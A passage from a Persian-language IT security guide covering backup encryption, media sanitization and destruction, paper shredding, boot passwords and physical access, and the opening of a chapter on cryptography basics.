ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺭﻣﺰﺷﺪﻩ ﺑﻪ ﻣﻴﺰﺍﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺍﻣﻜﺎﻥ ﻣﻔﻴﺪ ﻭﺍﻗﻊ ﺷﺪﻥ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻳﺎ ﻧﻮﺍﺭﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﻣـﺴﺮﻭﻗﻪ ﺭﺍ ﺑـﺮﺍﻱ ﺭﻗﻴـﺐ
ﻛﺎﻫﺶ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺩ .ﭼﻨﺎﻧﭽﻪ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﻴﺪ ،ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻴﺰ ﻣﺤﻔﺎﻇﺖ ﻣﻲﻛﻨﻴﺪ ،ﺗﺎ ﻫﻢ
ﻣﻬﺎﺟﻢ ﻧﺘﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺑﻴﺎﺑﺪ ،ﻭ ﻫﻢ ﺩﺭﺻﻮﺭﺕ ﺗﻌﻮﻳﺾ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻛﻠﻴﺪ ﺷﻤﺎ ﮔﻢ ﻧﺸﻮﺩ.
ﻼ ﻧﻮﺍﺭ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻧﺴﺒﺖ ﺑـﻪ ﻓﺮﺁﻳﻨـﺪﻱ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺑﺎﻳﮕﺎﻧﻲﻫﺎ ﺑﻌﻠﺖ ﺷﺮﺍﻳﻂ ﻣﺤﻴﻄﻲ ﺁﺭﺍﻡ ﺁﺭﺍﻡ ﭘﺎﻙ ﻣﻲﺷﻮﻧﺪ .ﻣﺜ ﹰ
ﻣﻮﺳﻮﻡ ﺑﻪ print throughﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﻴﺪﺍﻧﻬﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻳـﻚ ﻗـﺴﻤﺖ ﭘﻴﭽﻴـﺪﻩ ﺷـﺪﻩ ﺑـﻪ ﺩﻭﺭ ﻗﺮﻗـﺮﺓ ﻧـﻮﺍﺭ ،ﺭﻭﻱ
ﻻﻳﻪﻫﺎﻱ ﺯﻳﺮﻳﻦ ﺍﺛﺮ ﻣﻲﮔﺬﺍﺭﻧﺪ .ﺗﻨﻬﺎ ﺭﺍﻩ ﺍﻳﻨﻜﻪ ﺑﻔﻬﻤﻴﻢ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺁﺳﻴﺐ ﻣﻲﺭﺳﺎﻧﺪ ﻳﺎ ﻧﻪ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﻫـﺮ ﺍﺯ
ﭼﻨﺪﮔﺎﻩ ﺑﺮﺭﺳﻲ ﻛﻨﻴﻢ.
ﻳﻚ ﻣﺸﻜﻞ ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ ،ﺑﺮﭼﺴﺐﺯﻧﻲ ﻭ ﺻﻮﺭﺕ ﺑﺮﺩﺍﺭﻱ ﻧﺎﻣﻨﺎﺳﺐ ﺍﺯ ﺭﺳﺎﻧﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻲﺑﺎﺷﺪ .ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻫﺮ ﺳﻴﺴﺘﻢ ﺑﺮﭼﺴﺐﮔـﺬﺍﺭﻱ
ﻼ ﻣﺴﺘﻨﺪﺳﺎﺯﻱ ﻧﻤﺎﻳﻴﺪ.
ﻳﺎ ﻓﻬﺮﺳﺖﺑﺮﺩﺍﺭﻱ ﻛﻪ ﻣﺆﺛﺮ ﻣﻲﺩﺍﻧﻴﺪ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ ،ﻣﺸﺮﻭﻁ ﺑﺮ ﺍﻳﻨﻜﻪ ﻳﻜﻲ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻧﻤﻮﺩﻩ ﻭ ﻛﺎﻣ ﹰ
ﺩﺭ ﻣﻮﺭﺩ ﻧﻮﺍﺭﻫﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﭘﺎﻙﻛﻨﻨﺪﻩ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻳﺎ ﭘﺎﻛﺴﺎﺯ ﺍﻧﺒﻮﻩ -ﻳﻚ ﻭﺳﻴﻠﺔ ﺩﺳﺘﻲ ﺍﻟﻜﺘﺮﻭﻣﻐﻨﺎﻃﻴﺴﻲ ﻛـﻪ ﺩﺍﺭﺍﻱ ﻣﻴـﺪﺍﻥ
ﻣﻐﻨﺎﻃﻴﺴﻲ ﻗﻮﻱ ﺍﺳﺖ -ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ .ﺍﻃﻼﻋﺎﺕ ﻧﻮﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﺍﻧﺒﻮﻩ ﭘﺎﻛﺴﺎﺯﻱ ﻛﺮﺩﻩﺍﻳﺪ ﺭﺍ ﺁﻧﻘﺪﺭ ﻣﺠﺪﺩﹰﺍ ﺑﺨﻮﺍﻧﻴﺪ ﺗﺎ ﺑﻔﻬﻤﻴﺪ ﺑـﺮﺍﻱ
ﻣﺤﻮ ﻧﻤﻮﺩﻥ ﺩﺍﺩﻩﻫﺎ ﭼﻨﺪ ﺑﺎﺭ ﭘﺎﻙ ﻛﺮﺩﻥ ﺁﻧﻬﺎ ﺑﻪ ﺍﻳﻦ ﺭﻭﺵ ﻻﺯﻡ ﺍﺳﺖ.
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺑﺎﺯﻧﻮﻳﺴﻲ ﺭﺳﺎﻧﻪ ﻧﻮﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺣﺘﻲ ﻣﺤﺘﻮﻳﺎﺕ ﺭﺳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺗﻨﻬﺎ ﻳﻜﺒﺎﺭ ﻗﺎﺑﻞ ﻧﻮﺷﺘﻦ ﻫـﺴﺘﻨﺪ ﺭﺍ ﻧﻴـﺰ ﭘـﺎﻙ
ﻣﻲﻛﻨﻨﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﺛﺮﺑﺨﺸﻲ ﺍﻳﻦ ﺭﻭﺷﻬﺎ ﺍﺯ ﻳﻚ ﻧﻮﻉ ﺭﺳﺎﻧﻪ ﺑﻪ ﻧﻮﻉ ﺩﻳﮕﺮ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﺪ ،ﻭ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﺎﺯﻫﻢ ﻣﺎﻧـﺪﻩﻫـﺎﻳﻲ ﺍﺯ
ﺧﻮﺩ ﺑﺮﺟﺎ ﺑﮕﺬﺍﺭﺩ .ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﺷﺎﻳﺪ ﻧﺎﺑﻮﺩ ﻛﺮﺩﻥ ﻓﻴﺰﻳﻜﻲ ﺍﺭﺟﺢ ﺑﺎﺷﺪ.
ﻛﻮﺭﻩﻫﺎﻱ ﺯﺑﺎﻟﻪﺳﻮﺯﻱ ﻭ ﺣﻤﺎﻡﻫﺎﻱ ﺍﺳﻴﺪﻱ ﺑﺮﺍﻱ ﺍﺯ ﺑﻴﻦ ﺑﺮﺩﻥ ﻧﻮﺍﺭﻫﺎ ﺑﺴﻴﺎﺭ ﻣﻨﺎﺳﺐ ﻫﺴﺘﻨﺪ ،ﺍﻣﺎ ﺍﺯ ﻧﻈﺮ ﺷﺮﺍﻳﻂ ﻣﺤﻴﻂ ﺯﻳﺴﺖ ﻗﺎﺑﻞ ﻗﺒـﻮﻝ
ﻧﻤﻲﺑﺎﺷﻨﺪ .ﺗﺎ ﻫﻤﻴﻦ ﺍﻭﺍﺧﺮ ﺷﻜﺴﺘﻦ ﺩﻳﺴﻜﻬﺎﻱ ﺳﺨﺖ ﻭ ﺑﺴﺘﻪﻫـﺎﻱ floppyﺗـﺮﺟﻴﺢ ﺩﺍﺩﻩ ﻣـﻲﺷـﺪ ،ﺍﻣـﺎ ﺑـﺎ ﺍﻓـﺰﺍﻳﺶ ﺣﺠـﻢ ﺩﻳـﺴﻜﻬﺎ،
ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎ ﺑﺎﻳﺪ ﺑﻪ ﻗﻄﻌﺎﺕ ﻛﻮﭼﻜﺘﺮ ﻭ ﻛﻮﭼﻜﺘﺮﻱ ﺷﻜﺴﺘﻪ ﺷﻮﻧﺪ ﺗﺎ ﺍﻣﻜﺎﻥ ﺗﺤﻠﻴﻞ ﺁﺯﻣﺎﻳﺸﮕﺎﻫﻲ ﻣﻮﺍﺩ ﺣﺎﺻﻠﻪ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺑﺮﺍﻱ
ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎ ﺩﺳﺘﮕﺎﻩ ﭘﺎﻙﻛﻨﻨﺪﺓ ﻣﻐﻨﺎﻃﺴﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻭﻟﻲ ﻫﺰﻳﻨﺔ ﺁﻥ ﺑﺎﻻﺳﺖ .ﺩﺭﻧﺘﻴﺠﻪ ﺑﺘﺪﺭﻳﺞ ﺭﻭﺷﻬﺎﻱ ﭘﺎﻛﺴﺎﺯﻱ ﻭ ﺍﻧﻬﺪﺍﻡ ﻓﻴﺰﻳﻜـﻲ
ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﺗﻜﻨﻴﻜﻬﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﻭﺍﺝ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﻣﻲﺩﻫﻨﺪ.
ﻳﻚ ﺭﻭﺵ ﺭﺍﻳﺞ ﭘﺎﻛﺴﺎﺯﻱ ،ﺑﺎﺯﻧﻮﻳﺴﻲ ﻛﻞ ﺩﻳﺴﻚ ﻳﺎ ﻧﻮﺍﺭ ﺍﺳﺖ .ﺍﮔﺮ ﺑﺎ ﺍﻃﻼﻋﺎﺕ ﺑﺴﻴﺎﺭ ﻣﺤﺮﻣﺎﻧﻪ ﻳﺎ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻣﻨﻴﺖ ﺳﺮﻭﻛﺎﺭ ﺩﺍﺭﻳـﺪ ،ﺷـﺎﻳﺪ
ﺑﺨﻮﺍﻫﻴﺪ ﻳﻚ ﻧﻮﺍﺭ ﻳﺎ ﺩﻳﺴﻚ ﺭﺍ ﭼﻨﺪﺑﺎﺭ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻛﻨﻴﺪ ،ﭼﻮﻥ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﺍﺩﻩ ﺍﺯ ﻧﻮﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺗﻨﻬﺎ ﻳﻜﺒﺎﺭ ﺑﺎﺯﻧﻮﻳﺴﻲ ﺷﺪﻩﺍﻧﺪ
ﻻ ﻧﻮﺍﺭﻫﺎ ﺳﻪ ﺑﺎﺭ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻣﻲﺷﻮﻧﺪ -ﻳﻜﺒﺎﺭ ﺑﺎ ﺑﻠﻮﻛﻬﺎﻱ "ﺻﻔﺮ" ،ﻳﻜﺒﺎﺭ ﺑﺎ ﺑﻠﻮﻛﻬـﺎﻱ "ﻳـﻚ" ،ﻭ ﻳﻜﺒـﺎﺭ ﻫـﻢ ﺑـﺎ ﺍﻋـﺪﺍﺩ
ﺑﺎﺯﻳﺎﻓﺖ ﺷﻮﺩ .ﻣﻌﻤﻮ ﹰ
ﺗﺼﺎﺩﻓﻲ .ﺩﺭ ﻧﻬﺎﻳﺖ ﻣﻲﺗﻮﺍﻥ ﻧﻮﺍﺭ ﺭﺍ ﭼﻨﺪﺑﺎﺭ ﺍﺯ ﺍﺭﺓ ﻧﻮﺍﺭﻱ ﻋﺒﻮﺭ ﺩﺍﺩ ﺗﺎ ﺑﻪ ﻫﺰﺍﺭﺍﻥ ﻗﻄﻌﺔ ﻛﻮﭼﻚ ﭘﻼﺳﺘﻴﻜﻲ ﺗﺒﺪﻳﻞ ﺷﻮﺩ.
ﺑﺨﺶ ﭘﻨﺠﻢ
63 Sanitizing
64 Filtering
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٩٠
ﺑﺮﺍﻱ ﻫﺮﺟﺎ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺍﺭﺯﺵ ﺩﺭ ﺁﻧﺠﺎ ﺩﻭﺭ ﺭﻳﺨﺘﻪ ﻣﻲﺷﻮﺩ ﻛﺎﻏﺬ ﺧﺮﺩﻛﻦ ﺗﻬﻴﻪ ﻛﻨﻴﺪ .ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻣﻮﺯﺵ ﺩﻫﻴﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ
ﺭﺍ ﺩﺭ ﺳﻄﻠﻬﺎﻱ ﺧﺎﻧﻪ ﺩﻭﺭ ﻧﻴﺎﻧﺪﺍﺯﻧﺪ ،ﺑﻠﻜﻪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﺩﻓﺘﺮ ﺑﻴﺎﻭﺭﻧﺪ ﺗﺎ ﺩﺭ ﺩﺳﺘﮕﺎﻩ ﺧﺮﺩ ﺷﻮﻧﺪ .ﺍﮔﺮ ﺳﺎﺯﻣﺎﻧﺘﺎﻥ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛـﺎﻓﻲ ﺑـﺰﺭﮒ ﺍﺳـﺖ ﻭ
ﻗﺎﻧﻮﻥ ﺑﻪ ﺷﻤﺎ ﺍﻳﻦ ﺍﺟﺎﺯﻩ ﺭﺍ ﻣﻲﺩﻫﺪ ،ﺷﺎﻳﺪ ﻣﺎﻳﻞ ﺑﺎﺷﻴﺪ ﺑﺮﺧﻲ ﺍﺯ ﺩﻭﺭﺭﻳﺰﻫﺎﻱ ﻛﺎﻏﺬﻫﺎﻱ ﺣﺴﺎﺱ ﺭﺍ ﺩﺭ ﻣﺤﻮﻃﻪ ﻛﺎﺭﺧﺎﻧﻪ ﺑﺴﻮﺯﺍﻧﻴﺪ.
ﻛﻠﻴﺪﻫﺎﻱ ﻣﺤﺎﻓﻆ
ﺑﺮﺧﻲ ﺍﺯ ﺍﻧﻮﺍﻉ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻛﻠﻴﺪﻱ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺭ ﺣﺎﻟﺖ ﺗﻚﻛﺎﺭﺑﺮﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ ﺳﻴﺴﺘﻢ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ .ﺑﻌﻀﻲ
ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﻈﺎﺭﺕﻛﻨﻨﺪﻩﻫﺎﻱ ROMﻫﻢ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺭ ﺣﺎﻟﺖ ﺗﻚﻛﺎﺭﺑﺮﻩ ﺍﺯ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ ﺳﻴﺴﺘﻢ ﺑﺪﻭﻥ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺷـﺘﻦ ﺭﻣـﺰ ﻋﺒـﻮﺭ
ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻧﻤﺎﻳﺪ .ﺳﻴﺴﺘﻢ openBOOTﺷـﺮﻛﺖ Sunﻭ ﻫﻤـﺔ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺟﺪﻳـﺪ Macintoshﺑـﺮﺍﻱ ﻛﻨﺘـﺮﻝ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ
ﭘﻴﻜﺮﺑﻨﺪﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺍﺯ ﺳﻴﺴﺘﻢ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ.
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﻠﻴﺪﻫﺎﻱ ﻣﺤﺎﻓﻆ ﻭ ﻧﻈﺎﺭﺕﻛﻨﻨﺪﻩﻫﺎﻱ ROMﺍﻳﻤﻨﻲ ﺑﻴﺸﺘﺮﻱ ﻓﺮﺍﻫﻢ ﻛﺮﺩﻩﺍﻧﺪ ﻭ ﻫﺮﮔﺎﻩ ﻛـﻪ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ ﺑﺎﺷـﺪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ٦٦.ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺑﺎﻳﺪ ﺑﻪ ﺧﺎﻃﺮ ﺩﺍﺷﺖ ﻛﻪ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﺧﺘﻼﻝ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻓﻲ ﺍﺳﺖ ﻳﻜﻨﻔﺮ ﺁﻧـﺮﺍ ﺍﺯ ﭘﺮﻳـﺰ ﺑـﺮﻕ ﺟـﺪﺍ ﻛﻨـﺪ.
ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﻬﻤﺘﺮﻳﻦ ﺭﻭﺵ ﺣﻔﺎﻇﺖ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ،ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﻓﻴﺰﻳﻜﻲ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺖ.
65 Terminals
ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻧﻈﺎﺭﺕﻛﻨﻨﺪﻩﻫﺎﻱ ROMﻳﻚ ﺩﻟﻴﻞ ﺧﻮﺏ ﺩﻳﮕﺮ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻴﺎﻓﺘـﺪ ﺍﮔـﺮ ﻳـﻚ ﻣﻬـﺎﺟﻢ ﺑـﻪ ٦٦
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺳﺖ ﭘﻴﺪﺍ ﻛﻨﺪ ،ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﻭﻱ ﺁﻥ ﻗﺮﺍﺭ ﺩﻫﺪ ،ﻭ ﺳﭙﺲ ﺁﻧﺮﺍ ﺧﺎﻣﻮﺵ ﻛﻨﺪ.
٢٩١ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻓﺼﻞ ﭼﻬﺎﺭﻡ
ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ
ﻛﻠﻴﺎﺕ
ﺍﻳﻦ ﻓﺼﻞ ﺭﻭﻱ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻳﻲ ﺗﻤﺮﻛﺰ ﺩﺍﺭﺩ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺍﺯ ﺍﻧﺘﺸﺎﺭ ﻧﺎﺧﻮﺍﺳﺘﻪ ،ﺗﺤﺮﻳﻒ ،ﻭ ﻳﺎ ﺗﺨﺮﻳﺐ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﺍﺑﻌـﺎﺩ ﺍﻣﻨﻴـﺖ
ﻻ ﻣﺤﺮﻣﺎﻧﮕﻲ ٦٧ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ -ﻛﻪ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻳﺎ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴﺮ ﺩﺭ ﺩﺍﺩﻩﻫـﺎ ،ﺑﺮﻧﺎﻣـﻪﻫـﺎ ،ﻭ ﻳﻜﭙـﺎﺭﭼﮕﻲ ﺳﻴـﺴﺘﻢ ﺗﻮﺳـﻂ ﻛـﺎﺭﺑﺮﺍﻥ
ﻣﻌﻤﻮ ﹰ
ﻏﻴﺮﻣﺠﺎﺯ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﻨﻨﺪ -ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺩﻫﻨﺪ ﺍﻃﻼﻋﺎﺕ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺩﺳﺖﻧﺨﻮﺭﺩﻩ ﻭ ﺻﺤﻴﺢ ﺑﺎﻗﻲ ﻣﺎﻧﺪﻩﺍﻧﺪ .ﻣﺒﺎﺣﺚ ﺍﻳﻦ ﻗﺴﻤﺖ ﺗـﺎ
ﺣﺪ ﺯﻳﺎﺩﻱ ﻣﻔﻬﻮﻣﻲ ﺍﺳﺖ ،ﻫﺮﭼﻨﺪ ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺩ ﭼﻨﺪ ﺍﺻﻞ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻭﺍﻗﻌﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ.
ﺭﻣﺰﻧﮕﺎﺭﻱ
ﺭﻣﺰﻧﮕﺎﺭﻱ ٦٨ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺳﺖ ﺍﺯ ﻓﻨﻮﻥ ﺭﻳﺎﺿﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ .ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻲﺗـﻮﺍﻥ ﻛﻠﻤـﺎﺕ ﻣﻜﺘـﻮﺏ ﻭ ﺩﻳﮕـﺮ
ﺍﻧﻮﺍﻉ ﭘﻴﺎﻡ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺗﺒﺪﻳﻞ ﻛﺮﺩ ﻛﻪ ﺍﮔﺮ ﻛﺴﻲ ﻳﻚ ﻛﻠﻴﺪ ﻭﻳﮋﺓ ﺭﻳﺎﺿﻲ ﻛﻪ ﺑﺮﺍﻱ ﺑﺎﺯﻛﺮﺩﻥ ﻗﻔﻞ ﭘﻴﺎﻣﻬﺎ ﻻﺯﻡ ﺍﺳـﺖ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﻧﺪﺍﺷـﺘﻪ
ﺑﺎﺷﺪ ﺁﻥ ﭘﻴﺎﻣﻬﺎ ﺑﺮﺍﻳﺶ ﺑﻲﻣﻔﻬﻮﻡ ﺑﻨﻈﺮ ﺑﻴﺎﻳﺪ .ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮ ﻇﺎﻫﺮﻱ ﻳﻚ ﭘﻴﺎﻡ ،ﺭﻣﺰﮔﺬﺍﺭﻱ ٦٩ﻧﺎﻣﻴﺪﻩ ﻣـﻲﺷـﻮﺩ .ﻓﺮﺁﻳﻨـﺪ
ﺑﺎﺯﮔﺸﺖ ﻳﻚ ﭘﻴﺎﻡ ﺭﻣﺰﺷﺪﻩ ﺑﻪ ﻗﺎﻟﺐ ﺍﻭﻟﻴﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﻣﻨﺎﺳﺐ ﻧﻴﺰ ﺭﻣﺰﮔﺸﺎﻳﻲ ٧٠ﻧﺎﻡ ﺩﺍﺭﺩ.
ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺮﺍﻱ ﺍﻳﻦ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﻛﻪ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻳﻚ ﮔﻴﺮﻧﺪﺓ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ .ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ ﻭﻗﺘـﻲ ﻗﻄﻌـﻪﺍﻱ ﺍﺯ
ﺍﻃﻼﻋﺎﺕ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﻮﺩ ﻭ ﺳﭙﺲ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﺗﻮﺳﻂ ﻳﻚ ﺷﺨﺺ ﺛﺎﻟﺚ ﺍﺯ ﻣﻴﺎﻥ ﺭﺍﻩ ﺩﺯﺩﻳـﺪﻩ ﻳـﺎ ﺍﻓـﺸﺎ ﮔـﺮﺩﺩ ﺍﻣﻨﻴـﺖ ﺁﻥ ﺧﺪﺷـﻪﺩﺍﺭ
ﻧﺨﻮﺍﻫﺪ ﺷﺪ ،ﻣﺸﺮﻭﻁ ﺑﺮ ﺁﻧﻜﻪ ﻛﻠﻴﺪ ﻻﺯﻡ ﺑﺮﺍﻱ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﺍﻃﻼﻋـﺎﺕ ﺍﻓـﺸﺎ ﻧـﺸﺪﻩ ﺑﺎﺷـﺪ ﻭ ﺭﻭﺵ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺗـﻼﺵ ﺑـﺮﺍﻱ
ﻲ ﺑﺪﻭﻥ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﻘﺎﻭﻣﺖ ﻛﻨﺪ.
ﺭﻣﺰﮔﺸﺎﻳ ﹺ
ﻋﻼﻭﻩ ﺑﺮ ﺍﻓﺰﺍﻳﺶ ﻣﺤﺮﻣﺎﻧﮕﻲ ،ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﻋﺪﻡ ﺗﻜﺬﻳﺐ ﭘﻴﺎﻡ ٧١ﻧﻴﺰ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ.
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻳﺎ privacyﻛﻪ ﮔﺎﻫﻲ ﺑﺎ "ﻣﺤﺮﻣﺎﻧﮕﻲ" ) (confidentialityﺑﻪ ﺟﺎﻱ ﻫﻢ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﻭ ﮔﺎﻫﻲ ﻫﻢ ﺑﻪ ﻃﻮﺭ ﺟﺰﺋﻲﺗﺮ ﺑﻪ ﻣﺤﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺷﺨـﺼﻲ ﺍﻓـﺮﺍﺩ ﮔﻔﺘـﻪ ٦٧
ﻣﻲﺷﻮﺩ.
68 Cryptography
69 Encryption
70 Decryption
71 Message Non-Repudiation
72 Secret Key Algorithms
73 Private Key Algorithms
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٩٢
